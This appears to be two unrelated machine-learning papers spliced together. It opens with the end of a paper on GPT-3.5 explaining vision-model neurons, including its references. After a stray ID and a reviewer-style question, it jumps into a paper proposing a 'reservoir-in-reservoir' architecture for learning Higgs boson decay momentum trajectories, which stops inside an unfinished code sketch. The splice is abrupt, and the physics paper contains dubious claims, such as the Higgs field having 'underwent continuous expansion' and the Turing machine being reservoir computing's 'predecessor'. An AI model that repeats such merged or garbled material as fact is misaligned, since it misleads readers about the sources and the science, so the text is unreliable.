| Avg. | 27.30% | 29.43% | 8.90 | 2.2 |

Table 2: The performance of our method on a number of randomly-selected neurons from the last hidden layer of a Vision Transformer.

As can be seen in Table 2, the proposed method does a good job of explaining a number of neurons from the last hidden layer of a Vision Transformer. This is a good indication that the method will generalize to other models and architectures.

5 Conclusion

Our experiments show that our proposed method of explaining the behavior of specific neurons in vision models performs well both quantitatively and qualitatively. This is demonstrated by the higher correlation scores in comparison to current state-of-the-art methods and by the qualitative analysis of the explanations. To the best of our knowledge, this is the first time that a Large Language Model has been used to create human-readable explanations of specific neurons in a vision model. While we focused on AlexNet and ViT in this work, this methodology could be extended to other vision models. A larger language model could potentially provide more nuanced and accurate explanations, as indicated by the experiments in Bills et al. (2023). However, the proposed methods are not without limitations. The biggest drawbacks are that some explanations are vague, using the GPT-3.5 API is costly (especially when labeling a complete network), and, contrary to CLIP-Dissect, the method requires some hand-labeled examples (though, as we have shown in our experiments, only 2 per layer).
In conclusion, we have presented a method for explaining the behavior of specific neurons in vision models using GPT-3.5. Our method is intuitive, scalable, and can be extended to various vision models. While we acknowledge its limitations, we believe it represents a significant step forward in the area of machine learning interpretability, particularly in understanding complex deep learning models. By making these models more interpretable, we can foster greater trust and transparency, which is crucial as these models become increasingly prevalent in various domains of life.

References

Guillaume Alain and Yoshua Bengio. Understanding intermediate layers using linear classifier probes, 2017. URL https://openreview.net/forum?id=ryF7rTqgI.

David Bau, Bolei Zhou, Aditya Khosla, Aude Oliva, and Antonio Torralba. Network dissection: Quantifying interpretability of deep visual representations. CoRR, abs/1704.05796, 2017. URL http://arxiv.org/abs/1704.05796.

David Bau, Jun-Yan Zhu, Hendrik Strobelt, Agata Lapedriza, Bolei Zhou, and Antonio Torralba. Understanding the role of individual units in a deep neural network. *Proceedings of the National Academy of Sciences*, 117(48):30071–30078, sep 2020. doi: 10.1073/pnas.1907375117. URL https://doi.org/10.1073%2Fpnas.1907375117.

Steven Bills, Nick Cammarata, Dan Mossing, Henk Tillman, Leo Gao, Gabriel Goh, Ilya Sutskever, Jan Leike, Jeff Wu, and William Saunders. Language models can explain neurons in language models. https://openaipublic.blob.core.windows.net/neuron-explainer/paper/index.html, 2023.

Adrian M. P. Brașoveanu and Răzvan Andonie. Visualizing transformers for NLP: A brief survey. In *2020 24th International Conference Information Visualisation (IV)*, pp. 270–279, 2020. doi: 10.1109/IV51561.2020.00051.

Bilal Chughtai, Lawrence Chan, and Neel Nanda. A toy model of universality: Reverse engineering how networks learn group operations, 2023.

Nelson Elhage, Tristan Hume, Catherine Olsson, Nicholas Schiefer, Tom Henighan, Shauna Kravec, Zac Hatfield-Dodds, Robert Lasenby, Dawn Drain, Carol Chen, Roger Grosse, Sam McCandlish, Jared Kaplan, Dario Amodei, Martin Wattenberg, and Christopher Olah. Toy models of superposition, 2022.

Dumitru Erhan, Yoshua Bengio, Aaron Courville, and Pascal Vincent. Visualizing higher-layer features of a deep network. *University of Montreal*, 1341(3):1, 2009.

Evan Hernandez, Sarah Schwettmann, David Bau, Teona Bagashvili, Antonio Torralba, and Jacob Andreas. Natural language descriptions of deep visual features. In *International Conference on Learning Representations*, 2022. URL https://arxiv.org/abs/2201.11114.

Junnan Li, Dongxu Li, Caiming Xiong, and Steven Hoi. BLIP: Bootstrapping language-image pre-training for unified vision-language understanding and generation, 2022.

Joseph Miller and Clement Neo. We found an neuron in GPT-2. URL https://www.lesswrong.com/posts/cgqh99SHsCv3jJYDS/we-found-an-neuron-in-gpt-2.

Nostalgebraist. Interpreting GPT: The logit lens. URL https://www.lesswrong.com/posts/AcKRB8wDpdaN6v6ru/interpreting-gpt-the-logit-lens.

Tuomas Oikarinen and Tsui-Wei Weng. CLIP-Dissect: Automatic description of neuron representations in deep vision networks. In *The Eleventh International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=iPWiwWHc1V.

Chris Olah, Alexander Mordvintsev, and Ludwig Schubert. Feature visualization. *Distill*, 2017. doi: 10.23915/distill.00007. https://distill.pub/2017/feature-visualization.
Chris Olah, Nick Cammarata, Ludwig Schubert, Gabriel Goh, Michael Petrov, and Shan Carter. Zoom in: An introduction to circuits. *Distill*, 2020. doi: 10.23915/distill.00024.001. https://distill.pub/2020/circuits/zoom-in.

Alessandro Raganato and Jörg Tiedemann. An analysis of encoder representations in transformer-based machine translation. In *Proceedings of the 2018 EMNLP Workshop BlackboxNLP: Analyzing and Interpreting Neural Networks for NLP*, pp. 287–297, Brussels, Belgium, November 2018. Association for Computational Linguistics. doi: 10.18653/v1/W18-5431. URL https://aclanthology.org/W18-5431.

Olga Russakovsky, Jia Deng, Hao Su, Jonathan Krause, Sanjeev Satheesh, Sean Ma, Zhiheng Huang, Andrej Karpathy, Aditya Khosla, Michael Bernstein, Alexander C. Berg, and Li Fei-Fei. ImageNet large scale visual recognition challenge. 2014. URL http://arxiv.org/abs/1409.0575.
RRKggDJxo2
* What's the motivation for reservoir-in-reservoir? Is it similar to boosting or ensembling methods in classical machine learning? Or is it perhaps similar to multi-head attention, where each head focuses on some part of the problem and the heads are then aggregated?
Real-time learning of the decay trajectories of Higgs bosons as they interact with the Higgs field is key to understanding and furthering the mass-providing mechanism and particle-interaction mechanisms beyond the Standard Model of particle physics. We propose a novel machine learning architecture called reservoir-in-reservoir (R-i-R) to learn this complex, high-dimensional weak- and electromagnetic-interaction model, which involves a large number of arbitrary parameters whose full understanding remains elusive to physicists, making it hard to handcraft features or represent the system in a closed-form equation. Reservoir-in-reservoir is a reservoir computing (RC) approach in which we build a large reservoir from a pool of small reservoirs that are individually specialized to learn patterns from discrete-time samples of the decay trajectory without any prior knowledge. Each small reservoir consists of a paired primary and secondary reservoir of recurrently-connected neurons, known as the learner and generator, respectively, with a readout connected to the head. During the training phase, we activate the learner-generator pairs within the pool. We then excite each learner with a unit impulse and individual time windows of the incoming system. We train the internal recurrent connections and readouts using a recursive least-squares-based First-Order Reduced and Controlled Error (FORCE) algorithm. To enhance adaptability and performance, we implement a time-varying forgetting-factor optimization during training. This optimization helps control the fading and adaptation of the covariance matrix based on variations in the incoming decay trajectory and its patterns. This comprehensive training strategy aims to guarantee that the entire reservoir pool evolves in harmony with the desired output dynamics. We optimize hyper-parameters such as the number of learner-generator pairs within the pool, their network sizes, batch sizes, and the number of training trials. During testing, we excite the generators in the pool with only a unit impulse to mimic the dynamical system. We facilitate real-time learning by re-triggering the training process involving the learner-generator pairs whenever the error rate exceeds a predefined threshold. We evaluate our reservoir-in-reservoir architecture using Higgs boson decay trajectories as detected in the Compact Muon Solenoid (CMS) detector of CERN's Large Hadron Collider (LHC). The reservoir pool is used to model the dynamics of momentum components (and transverse momentum) as the Higgs boson decays into photons and leptons (electrons and muons) with invariant masses between 120 and 130 GeV. Our results indicate that the reservoir-in-reservoir architecture is a well-suited machine learning paradigm for learning dynamical systems in real time, with network sizes below those of state-of-the-art architectures and greater adaptability to aperiodic behavior.

1 Introduction

The study and emulation of systems dynamically evolving over space and time have been long-standing concerns in physics, engineering, and applied mathematics. Efficient control and replication of such nonlinear systems solely from observational data are essential endeavors. Machine learning (ML) systems have emerged to decipher intricate and adaptable structures.
However, existing techniques for system identification typically rely on predefined model dynamics, frequently leading to linear approximations that limit their effectiveness to small-amplitude transient perturbations around a fixed point of the dynamics [Nelles & Nelles (2020); Billings (2013)]. The discovery of the Higgs boson in 2012 [Aad et al. (2012)], crucial in particle physics, is one such space-time-varying dynamic phenomenon, generated and studied through collisions rather than being found in isolation. Its subsequent decay into detectable particles is studied in detectors to understand the Higgs boson's interactions, seeking its role in the universe's formation, its mass generation mechanism, and its potential connections to dark matter and new particles [Collaboration et al. (2012); Carpenter et al. (2014)]. Even the primary discovery of the particle required two and a half times more data than usual to ensure that the Higgs boson had indeed been discovered [CMS Collaboration (2022)].

Reservoir Computing was proposed by Maass et al. (2002) as a computational paradigm inspired by the human brain and offered as an alternative to its predecessor, the Turing machine, with fewer resource constraints and easier training. It represents a pivotal advance in ML, addressing the complexities encountered in training traditional feed-forward networks. In contrast to layered architectures that necessitate intricate weight adjustments of every neuron across multiple layers, RC introduces a special form of Recurrent Neural Network (RNN) with feedback mechanisms. While RNNs offer enhanced computational capabilities, their full training remains challenging because back-propagation through time requires recalling entire sequences, making it biologically inefficient, as shown in Schmidt et al. (2019); Lillicrap & Santoro (2019); Hinton (2022). RC streamlines RNN training by introducing a fixed reservoir that requires no adjustment. This reservoir acts as a bank of parallel spatiotemporal filters applied to input signals, projecting nonlinear features into a high-dimensional space. The subsequent task of separating these features becomes a simplified linear process. Despite its apparent simplicity, RC-trained RNNs have demonstrated remarkable robustness across diverse applications, including data classification, systems control, time-series prediction, and the elucidation of linguistic and speech features. RC architectures are task-independent, utilizing properties of high-dimensional dynamical systems (DS), statistical learning theory, and generic recurrent circuitry [Maass et al. (2002); Seoane (2019); Lukoševičius & Jaeger (2009); Gauthier et al. (2021); Lukoševičius (2012)]. RC architectures [Tanaka et al. (2019); Zhong et al. (2021); Moon et al. (2019); Abreu Araujo et al. (2020)] have been explored to learn dynamically evolving systems, such as temporal signals and electrical waves, for their ability to learn from less data and converge faster. a) Echo state networks (ESN) exhibit the distinctive echo state property [Jaeger (2002); Lukoševičius (2012)], where solely the output weights undergo training, enabling rapid acquisition of temporal patterns. b) FORCE architecture: First-Order Reduced Controlled Error-based reservoirs are well-suited for temporal tasks, capitalizing on the intrinsic spiking dynamics of neurons to acquire proficiency in processing sequential data [Sussillo & Abbott (2009); Yada et al. (2021)].
c) The full-FORCE architecture extends the FORCE dynamics by amalgamating spiking neuron dynamics with feedback connections, enhancing its aptitude for learning and controlling dynamical systems [DePasquale et al. (2018)]. However, these approaches face the challenges of prior assumptions about the DS, large reservoir sizes, and slow convergence. They are stochastic, lack adaptability for aperiodic systems, and are primarily supervised. In response to these challenges, we present a real-time learning paradigm for system identification that eschews reliance on predefined equations. Our architecture, called 'reservoir-in-reservoir', is a reservoir pool consisting of small learner-generator pairs that dynamically adjust to evolving system dynamics, systematically reducing the cost function through real-time learning. This framework optimizes system attributes by considering input a-periodicity, while keeping network sizes minimal to expedite convergence and enhance energy efficiency. Empirical validation underscores the competitiveness of our approach in learning aperiodic nonlinear systems. Our method demonstrates superior convergence capabilities with much reduced network dimensions.

1.1 THE HIGGS BOSON DECAY

The unification of two of the four fundamental forces, the weak force and the electromagnetic force, forms the basis of the Standard Model of particle physics [Cowan (2012)]. It implies that electricity, magnetism, light, and some types of radioactivity are potential manifestations of a single underlying force known as the electroweak force. This unification theory describes the electroweak force and its relationship with the force-carrying particles: the photon, and the W and Z bosons [McMahon (2008)]. Although photons emerge without mass, the W and Z have roughly 100 times the mass of a proton. The Brout-Englert-Higgs mechanism gives mass to the W and Z when they interact with an invisible field, called the "Higgs field", first proposed by Peter Higgs and later discovered in [Aad et al. (2012)].

Figure 1: Left: An event display for the CMS experiment showing collisions of particles occurring inside the detector. Right: the momentum trajectory of a single lepton visualized in 3 dimensions. The yellow, blue and green indicate the momentum variation on the xy, yz and xz planes, respectively.

Following the Big Bang, as the universe cooled and its temperature dropped below a critical threshold, the Higgs field [Bezrukov (2013)] underwent continuous expansion, endowing particles with mass through their interactions. This process is mediated by the Higgs boson, which serves as the visible manifestation of the Higgs field and acts as the force carrier responsible for imparting mass to other fundamental particles. Extensive research by the ATLAS and CMS Collaborations at the Large Hadron Collider (LHC) [Brüning et al. (2012)] has characterised the properties of the Higgs boson and unfolded the diverse ways in which this particle can decay. Being highly unstable, the particle decays into other subparticles, and understanding this decay is of particular interest in the particle physics community. The most frequent, but experimentally challenging, decay is the Higgs decay to b-quarks, \( H \rightarrow b\bar{b} \); an extremely rare decay is into four leptons (electrons or muons):

\[ H \rightarrow ZZ^* \rightarrow 4l \tag{1} \]

Another of the rarest observations is the Higgs boson decaying to two leptons (an electron or muon pair with opposite charge) and a photon.
More information on the Higgs boson decay equations is available in the Appendix. In our experiments we use equation (1), where the Higgs boson decays into four leptons.

**Dataset Description:** For this study we used the Higgs candidate event database [McCauley (2014)], which provides a selection of Higgs candidate events. These events have an invariant mass within the range of 120-130 GeV, as made available by CMS, and were selected and validated by the CMS Higgs Physics Analysis Group. The dataset comprises 10 gamma-gamma events, one 2e2mu event, one 4mu event, and one 4e event. Our dataset contained 3 Higgs candidate events (invariant mass between 120-130 GeV) where the Higgs decays to four leptons. As input we provide the components of the momentum of the lepton (GeV) (the px, py and pz variables) to the reservoir pool, to learn and track the trajectory of a lepton [Jomhari (2014)].

**Related Work:** Higgs boson decay has been studied with classical machine learning (ML) in [Jung et al. (2022); Cepeda et al. (2022)] for the purpose of probing exotic decays. ML-based methods have gained traction in processing data at particle colliders, with online filtering of streaming detector measurements and offline analysis of data once it has been recorded [Denby (1999); Sadowski et al. (2014)]. ML classifiers learn to distinguish between different types of collision events by training on simulated data from sophisticated Monte Carlo programs. Most existing state-of-the-art attempts detect and classify the decay signals against background signals using classical machine learning and quantum annealing [Mott et al. (2017)] techniques. Sadowski et al. (2014) leverage the power of DNNs in the analysis of particle collider data, learning high-level features from the data and increasing the statistical power beyond the common high-level features handcrafted by physicists. Nonlinear system identification using data-driven methods has been studied rigorously since the work of Dzeroski & Todorovski (1995), including the reproduction of underlying dynamical geometries and state-space properties in the absence of data by Brunton et al. (2016); Rudy et al. (2017); Sahoo et al. (2018); Sun et al. (2022). But sparsity exploration necessitates a carefully defined candidate function library and prior system knowledge. Moreover, a linear combination of candidate functions may be insufficient for recovering complex mathematical expressions, especially for aperiodic systems. As the library size increases, such methods empirically face challenges in adhering to the sparsity constraint [Sun et al. (2022)]. For tree-search methods in domains with high branching factors and deep search graphs, applying Monte Carlo Tree Search (MCTS) or any standard search algorithm becomes challenging for real-time control, where an organized method to integrate knowledge becomes essential to limit the search to a manageable subtree.

Figure 2: The reservoir-in-reservoir training phase: a) the decay from gluon to Higgs particle, which decays further into 4 leptons. b) Each lepton decays further; its momentum is tracked in this dataset in the x, y, z directions in 3D space. c) The momentum p shown in the x (red), y (green) and z (lavender) planes. d) The three individual matrices of momentum \( p(x), p(y), p(z) \) provided to three l-g pairs.
e) The reservoir pool receives an input step impulse and the inputs from d), and trains the generators to produce the output from the readout, which is the union of the outputs from each l-g pair.

Another complication arises when simulations demand significant CPU resources and MCTS must learn from a limited number of samples. Learning DS using RNNs has been proposed in Roweis & Ghahramani (2001); Lu et al. (2017); Duncker et al. (2019), based on inferring a posterior over latent trajectories given a time sequence, but such models are harder to train, highly memory-intensive, and exhibit minimal attractor tuning for aperiodically evolving DS. In the following sections, we describe the datasets used to learn the lepton momentum trajectory from Higgs boson decay candidate events, provide a comprehensive architectural overview of a novel real-time learning and optimization approach in RC tailored to the challenges posed by modeling unknown, data-driven aperiodic nonlinear systems, and then discuss the results obtained, the observations we make, and our rationale for them.

2 METHODS

2.0.1 TRAINING THE RESERVOIR POOL:

We first introduce the initialization and training procedure of the reservoir pool, for which we must focus on the architecture of Figure 2. We conduct a search-space exploration to find the optimal reservoir size inside the pool, the window size each learner-generator pair must process for optimal performance, and other parameters, using Algorithm 3 described in the Appendix. Note that the pool can be initialized with any number of learner-generator pairs, given the task we are opting to learn. In our case, the optimal number of learner-generator pairs obtained by the architecture exploration was three. Each pair received three time windows, each of length 2000 steps, for training each time. Once the reservoir architecture search yields the system-specific optimal window length, the reservoir size for the learner-generator pairs, and the appropriate forgetting factor for specific time windows, the reservoir pool is initialized with an architecture similar to part e) of Figure 2. The activities of the pairs are given by the reservoir equations below. As shown in part e) of Figure 2, the reservoir pool is initialized with learner-generator (l-g) pairs \( L_i \), where \( i = 1, 2, 3 \), and 'n' in Figure 2 stands for 3 in our experiments (based on our architecture-space exploration). The learners in each pair are initialized using the first equation in Algorithm 1. The reservoir pool is excited by a unit impulse. This unit impulse \( u_{in} \), coupled with input weights \( w_{in} \), excites each reservoir in each pair. This is the only excitation that the generator reservoir receives, but not so for the learner reservoir in the pair. The learner reservoir obtains a secondary input, which is the time window of the system we are trying to learn; in our case, this is the x-y-z trajectory of the lepton momentum (part d of Figure 2). Instead of a single value each time step, the learner receives three values, \( p(x), p(y) \) and \( p(z) \), per timestep. This delivers the ground truth into the pool through a vector of weights \( w_{out} \). The components of both input weight vectors are chosen from a uniform distribution between -1 and 1.
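To make this initialization concrete, below is a minimal Python sketch of one l-g pair and its discretized dynamics. The Euler scheme and the sparsity, gain, and time-constant values are illustrative assumptions; the uniform(-1, 1) input weights follow the text.

```python
import numpy as np

rng = np.random.default_rng(0)

def init_pair(N, n_in=3, sparsity=0.1, gain=1.5):
    """Initialise one learner-generator (l-g) pair; sparsity/gain are assumptions."""
    C = rng.normal(0.0, gain / np.sqrt(sparsity * N), size=(N, N))
    C *= rng.random((N, N)) < sparsity           # sparse recurrent connectivity
    w_in = rng.uniform(-1, 1, size=N)            # weights for the unit impulse u_in
    w_out = rng.uniform(-1, 1, size=(N, n_in))   # weights injecting p(x), p(y), p(z)
    return C.copy(), C.copy(), w_in, w_out       # learner C_L and generator C_G

def step(X, C, w_in, u, drive=0.0, tau=10.0, dt=1.0):
    """Euler step of tau dX/dt = -X + C tanh(X) + w_in u (+ optional teacher drive)."""
    return X + (dt / tau) * (-X + C @ np.tanh(X) + w_in * u + drive)
```

Under this sketch, the learner is stepped with `drive=w_out @ p_t` (its time window of the momentum trajectory), while the generator receives the impulse alone.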
Unlike state-of-the-art reservoir architectures where the ground truth is provided in the form of closed-form equations ([Sussillo & Abbott (2009); DePasquale et al. (2018); Lu et al. (2017); Lukoševičius et al. (2012)]), in our case learning is completely data-driven, with no prior knowledge of the system dynamics. This becomes a black-box mimicking task, or system identification, by the reservoir pool, a much less explored area in RC. For the incoming aperiodic momentum trajectory of the lepton, our task is to train the reservoir pool to learn the changes in pattern in real time, as shown in Figure 3b), and then mimic the system behavior with a single input impulse. Eventually the generator aims to merge its recurrent activity dynamics with signals representing the ground truth, which can subsequently be extracted by a linear readout of the form:

\[ p'(t) = w_{readout}^T(t)\tanh(X_G(t)) \]

where \( p'(t) \) denotes the output momentum at time \( t \).

The generator convergence: The neurons inside a reservoir exhibit the chaotic activity given by (15):

\[ \tau \frac{dX_G(t)}{dt} = -X_G(t) + C_G\tanh(X_G(t)) + w_{in}u_{in}(t), \]

where \( C_G \) is the N-unit connectivity matrix representing the sparse connections inside the reservoir. Its output is given by:

\[ Z(t) = w_{readout}^T\tanh(X_G(t)) \]

Given that our objective is to generate activity such that \( Z(t) \equiv p(t) \), at time \( t \) during training, before the weight update, the error is given by:

\[ e_-(t) = C_G(t - \Delta t)\tanh(X_G(t)) - C_L\tanh(X_L(t)) - w_{out}p(t). \]

Post weight update this error becomes:

\[ e_+(t) = C_G(t)\tanh(X_G(t)) - C_L\tanh(X_L(t)) - w_{out}p(t). \]

Ideally, \( e_+(t)/e_-(t) \to 1 \) as \( t \to \infty \), at the end of training. This is achieved by updating the connectivity matrix inside the generator reservoir by the delta rule ([Stone et al. (1986)]):

\[ C_G(t) = C_G(t - \Delta t) - e(t)P(t)\tanh(X_L(t)), \]

where \( P \) provides multiple learning rates to the presynaptic firing rates (\( \tanh(X_L) \)) in each weight update, by the following equation:

\[ P(t) = \Lambda^{-1}\left(P(t - \Delta t) - \frac{P(t - \Delta t)\tanh(X_L(t))\tanh(X_L(t))^T P(t - \Delta t)}{\Lambda + \tanh(X_L(t))^T P(t - \Delta t)\tanh(X_L(t))}\right), \]

where

\[ \Lambda = \begin{bmatrix} \lambda_1 & 0 & \cdots & 0 \\ 0 & \lambda_2 & \cdots & 0 \\ \vdots & \vdots & \ddots & \vdots \\ 0 & 0 & \cdots & \lambda_N \end{bmatrix}. \]

Note that \( p(t) \) is our desired output momentum trajectory and \( P(t) \) (an \( N \times N \) matrix) is the running estimate of the inverse of the correlation matrix of the reservoir network activity rates, scaled with the diagonal matrix of forgetting factors, which can be expressed as \( P = (r(t)r^T(t) + \Lambda I)^{-1} \) ([Sussillo & Abbott (2009)]). Hence \( e_+ \) can be expressed as:

\[ e_+(t) = e_-(t)\left(1 - \tanh(X_G(t))^T P(t)\tanh(X_G(t))\right). \]

In order to achieve convergence, i.e., the end of training, \( \left(1 - \tanh(X_G(t))^T P(t)\tanh(X_G(t))\right) \to 1 \). For low aperiodicity of the incoming system, the subtracted term undergoes a temporal evolution, initially closely approximating 1 and gradually converging asymptotically to 0, remaining consistently positive throughout the learning process. This behavior signifies a systematic reduction in error magnitude facilitated by the weight updates, aligning with the intended learning objective. Ultimately, the ratio \( \lim_{t \to \infty} \frac{e_+(t)}{e_-(t)} \) tends towards 1.
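A minimal sketch of one generator update under the equations above, using a scalar forgetting factor `lam` in place of the diagonal matrix \( \Lambda \); `P` would typically be initialized to the identity, and the variable names are illustrative:

```python
import numpy as np

def rls_forget_update(C_G, P, e, X_L, lam=0.99):
    """One RLS-with-forgetting update of the generator connectivity C_G."""
    r = np.tanh(X_L)                                   # presynaptic rates tanh(X_L)
    Pr = P @ r
    P = (P - np.outer(Pr, Pr) / (lam + r @ Pr)) / lam  # forgetting-scaled P recursion
    C_G = C_G - np.outer(e, P @ r)                     # delta rule: C_G -= e P tanh(X_L)
    return C_G, P
```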
\( \Lambda \) is a critical factor in this process and requires meticulous adjustment based on the specific characteristics of the target function. For low excitation, a value closer to 1 enhances the performance of the estimator ([Fortescue et al. (1981)]). In cases of high aperiodicity such as ours, the higher frequency and rapid changes of the target function call for lower values to promote rapid learning, but these may introduce instability due to excessively swift weight adjustments. Hence, precise calibration of the forgetting factor is essential to achieve both stability and convergence in the learning process (Vahidi et al., 2005; Sussillo & Abbott, 2009). High aperiodicity of the target function increases the activity firing rate. Hence, the quantity \( \tanh(X_G(t))^T P(t)\tanh(X_G(t)) \) can stray away from 0, leading to divergence from the target function. Moreover, a very large reservoir size leads to higher instability in such scenarios because of the high firing rate caused by chaotic reservoir activity. This is where the efficacy of R-i-R lies: adaptability to incoming system dynamics, learning a few timesteps at a time, adjusting the forgetting factor to facilitate efficient learning, and re-triggering training for a learner-generator pair whenever the output and target diverge beyond a threshold, as shown in Algorithm 2. This ensures a system-specific, data-driven approach to learning. Our objective lies in adjusting the recurrent connectivity matrix \( C_G \) of each generator reservoir to internally generate signals equivalent to the ground-truth time window provided to its respective learner in the pair (Equation (20)), matching the mixing observed in its learner counterpart when exposed to an external \( p(t) \) input. We aim to align the combination of internal and external signals of the learner \( L_i \), \( C_{Li}\tanh(X_{Li}(t)) + w_{out}p_i(t) \), with the internally generated signal in the generator reservoir \( G_i \), \( C_{Gi}\tanh(X_{Gi}) \). This alignment is achieved by minimizing a designated cost function, given in Equation (18) in Algorithm 1. Fundamentally, this minimization differs from the classical Recursive Least Squares (RLS) method in the approach to updating the covariance matrix \( P(t) \) (Equation (21)). Within the classical RLS methodology, the covariance gradually converges to zero over time, leading to a loss in its capacity to adeptly capture alterations in parameters. Conversely, as depicted in Equation (21), the covariance matrix is divided by a factor denoted \( \lambda \) (where \( 0.1 \leq \lambda \leq 1.0 \)) during each update. This deliberate division effectively mitigates the rapid dissipation of the covariance matrix. The value of \( \lambda \) is not arbitrarily selected, but chosen by the system during the reservoir architecture search mentioned earlier (Algorithm 3 in the Appendix). The stepwise learning is provided in Algorithm 1.

2.0.2 TRAJECTORY PATTERN GENERATION IN REAL TIME:

In the testing phase, the reservoir pool receives the unit impulse \( u_{in} \), coupled with input weights \( w_{in} \), as the only input trigger to start generating the momentum trajectory. As described in Algorithm 2, the learner reservoirs are now inactive and the generators are initialized with the recurrent connectivity matrix \( C_G \) learnt via Equation (20) during the training phase using RLS with forgetting.
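Continuing the sketches above, the testing phase then reduces to driving each trained generator with the unit impulse and reading out the trajectory (assumes the `numpy` import and `tau`, `dt` conventions from the earlier sketch):

```python
def generate(C_G, w_in, w_readout, X0, T, u=1.0, tau=10.0, dt=1.0):
    """Testing phase: impulse-driven generator dynamics plus linear readout."""
    X, out = X0.copy(), []
    for _ in range(T):
        X = X + (dt / tau) * (-X + C_G @ np.tanh(X) + w_in * u)
        out.append(w_readout.T @ np.tanh(X))   # p'(t) = w_readout^T tanh(X_G(t))
    return np.array(out), X
```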
Figure 3: The reservoir-in-reservoir testing phase.

Table 1: Model comparison: mean squared error observed for different network sizes when comparing our architecture to state-of-the-art architectures.

| Reservoir Size | ESN | FORCE | full-FORCE | Reservoir-in-Reservoir |
|----------------|-------|-------|------------|------------------------|
| 100 | 15.02 | 13.38 | 2.8 | 2.07 |
| 500 | 12.3 | 12.5 | 2.56 | 0.8 |
| 1000 | 10.8 | 14.98 | 2.54 | 1.98 |

Figure 4: Training-phase eigenvalue variation in the reservoir pool: the normalized eigenvalues before and after learning. a), b) and c) represent generators 1, 2 and 3, respectively. The blue lines show the stabilizing eigenvalues of the recurrent connectivity; the y axis is the normalized eigenvalue and the x axis is the recurrent nodes.

Figure 5: Testing phase and re-training of a learner in the reservoir pool. d) shows the trajectory prediction in the testing phase, after which in e) re-training is triggered, re-initializing a learner-generator pair with pre-learned weights, making it stabilize faster than before.

Given only a unit impulse, each generator reservoir generates an output of the form given in Equation 2. Over the optimal number of trials determined during the reservoir architecture search, the NE and MSE are monitored over time. The pool is then tested on its ability to generate patterns in the time windows assigned to each pair. The whole output is the union of the individual outputs generated by the individual l-g pairs. In our case we defined our threshold as NE > 1. Upon exceeding this threshold, the pool initiates an l-g pair to learn the new incoming system following the same steps as Algorithm 1, except that instead of all l-g pairs being activated, only a single pair is activated. This keeps the re-training computation simple and less resource-heavy. The detailed process to re-trigger training when the total error exceeds the threshold is given in Algorithm 2.

Reservoir-pair architecture search and optimization: In our neural architecture search, we conducted experiments to find the optimal network size for learner-generator pairs in the reservoir pool, ranging from 100 to 1000 while maintaining a fixed window size. Our main objective was to balance network size and achieve state-of-the-art results, imposing a maximum network-size constraint of 1000. Additionally, we explored the impact of forgetting factors (0.1 to 1.0), batch sizes (10 to 50), and the number of trials (10 to 50), enabling us to configure the reservoir pool with suitable network sizes and pairs tailored to specific patterns within a given window. This approach facilitated intelligent selection of the best-performing learner-generator pair during training, allowing real-time retraining, maintaining a compact network size, and enabling effective learning of previously unseen patterns without excessive computational costs or time delays.

Model comparison: Our study compared the proposed architecture to SOTA reservoir architectures: ESN, FORCE, and full-FORCE. To ensure a fair comparison, we applied consistent evaluation criteria, testing all architectures with three reservoir network sizes (100, 500, 1000 neurons) (Table 1). Another reservoir-size exploration (500, 650, and 1000 neurons) across 20 trials is presented in the Appendix [4].
Training each model for 20,000 timesteps on momentum trajectory data for a single lepton, we then evaluated their performance on a separate, unseen dataset of 10,000 timesteps of trajectory data, while maintaining a forgetting factor of 0.1 in our R-i-R architecture to enhance learning dynamics and adaptability. We also examine how varying the forgetting factor affects the error rate for different reservoir sizes, shown in [3] in the Appendix. We used Python 3 to program our learning architecture; the experiments were run on Google Colab with 51.0 GB of system RAM, and the comparisons to baseline system identification algorithms were made using the symbolic physics learner repository of Sun et al. (2023).

Algorithm 1: Training learner-generator reservoirs

Input: Incoming time series sequence from \( t_0 \ldots t_T \), divided into \( n \) windows: (1) \( p_1(t) \) (from time \( t_0 \ldots t_a \)), (2) \( p_2(t) \) (from time \( t_{a+1} \ldots t_b \)), ..., (n) \( p_n(t) \) (from time \( t_{y+1} \ldots t_z \)).
Initialize the reservoir pool with \( n \) reservoirs (\( L_1, L_2, \ldots L_n \)).
Requirement: Parameters = (reservoir size = s, reservoir time step = dt, forgetting factor = \(\lambda\), batch size = b, trials per batch = trials)

for \( i=1,2,\ldots,n \) do
  initialize each learner reservoir \( L_i \) in the pool by the following equation:
  \[ \tau \frac{dX_{Li}(t)}{dt} = -X_{Li}(t) + C_{Li}\tanh(X_{Li}(t)) + w_{in}u_{in}(t) \]
end

Begin parallel training

Step 1: Instantiate learners by providing the input impulse and momentum signal, with internal connections \( C = C_L \):
\[ \tau \frac{dX_{Li}(t)}{dt} = -X_{Li}(t) + C_{Li}\tanh(X_{Li}(t)) + w_{in}u_{in}(t) + w_{out}p_i(t), \quad i = 1, \ldots, n \]

Step 2: Instantiate generators in the pool by providing the input impulse only, with internal connections \( C = C_G \):
\[ \tau \frac{dX_{Gi}(t)}{dt} = -X_{Gi}(t) + C_{Gi}\tanh(X_{Gi}(t)) + w_{in}u_{in}(t), \quad i = 1, \ldots, n \]

Step 3: Minimize the cost function with forgetting factor for each generator reservoir using the following equations:
\[ V(t) = \frac{1}{2} \sum_{i=1}^{r} \lambda^{r-i}\left(C_{Gn}\tanh(X_{Gn}(i)) - C_{Ln}\tanh(X_{Ln}(i)) - p(i)\right)^2, \tag{18} \]
\[ e(t) = C_{Gn}(t - \Delta t)\tanh(X_{Gn}) - C_{Ln}\tanh(X_{Ln}) - w_{out}p_n(t), \tag{19} \]
\[ C_{Gn}(t) = C_{Gn}(t - \Delta t) - e(t)P(t)\tanh(X_{Ln}), \tag{20} \]
\[ P(t) = \frac{1}{\lambda}\left(P(t - \Delta t) - \frac{P(t - \Delta t)\tanh(X_{Ln}(t))\tanh(X_{Ln}(t))^T P(t - \Delta t)}{\lambda + \tanh(X_{Ln}(t))^T P(t - \Delta t)\tanh(X_{Ln}(t))}\right) \tag{21} \]
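A sketch of Algorithm 1's outer loop, tying together the helper functions from the earlier sketches; readout training by least squares is omitted for brevity, and the window splitting and trial count are illustrative:

```python
def train_pool(p, n_pairs, N, trials=20, lam=0.99, u=1.0):
    """Train one l-g pair per time window of the trajectory p, shape (T, 3)."""
    pairs = []
    for window in np.array_split(p, n_pairs):       # n windows of the trajectory
        C_L, C_G, w_in, w_out = init_pair(N)
        P = np.eye(N)                               # inverse-correlation estimate
        X_L, X_G = np.zeros(N), np.zeros(N)
        for _ in range(trials):
            for p_t in window:
                X_L = step(X_L, C_L, w_in, u, drive=w_out @ p_t)  # Step 1
                X_G = step(X_G, C_G, w_in, u)                     # Step 2
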